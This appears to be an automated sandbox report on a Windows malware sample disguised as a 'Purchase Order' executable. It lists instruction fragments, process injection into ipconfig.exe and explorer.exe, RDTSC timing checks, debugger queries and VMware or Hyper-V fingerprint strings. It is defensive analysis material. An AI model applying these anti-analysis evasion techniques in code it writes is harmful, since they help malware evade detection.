          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E0595 push ecx; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013DD44F push ecx; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00415913 push edx; retf
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AC62 push D8D19732h; iretd
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414D57 push esi; retf
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AD65 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414DEA push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041ADB2 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041ADBB push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414E7E push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0041AE1C push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00414E24 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0040FF92 push 00000033h; iretd
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02ECD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B15913 push edx; retf
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14E24 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AE1C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14E7E push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B0FF92 push 00000033h; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AC62 push D8D19732h; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1ADB2 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1ADBB push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14DEA push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1AD65 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B14D57 push esi; retf

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeRDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeRDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002B083D4 second address: 0000000002B083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002B0876E second address: 0000000002B08774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_004086A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5636Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6160Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000002.00000000.251236949.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259375031.0000000008C73000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.254456910.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259579486.0000000008D97000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}October%%
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_004086A0 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00409900 LdrLoadDll,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD014 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD051 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FD0B4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013FC520 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01051074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01042073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01055BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01014257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8DB40 mov eax, dword ptr fs:[00000030h]
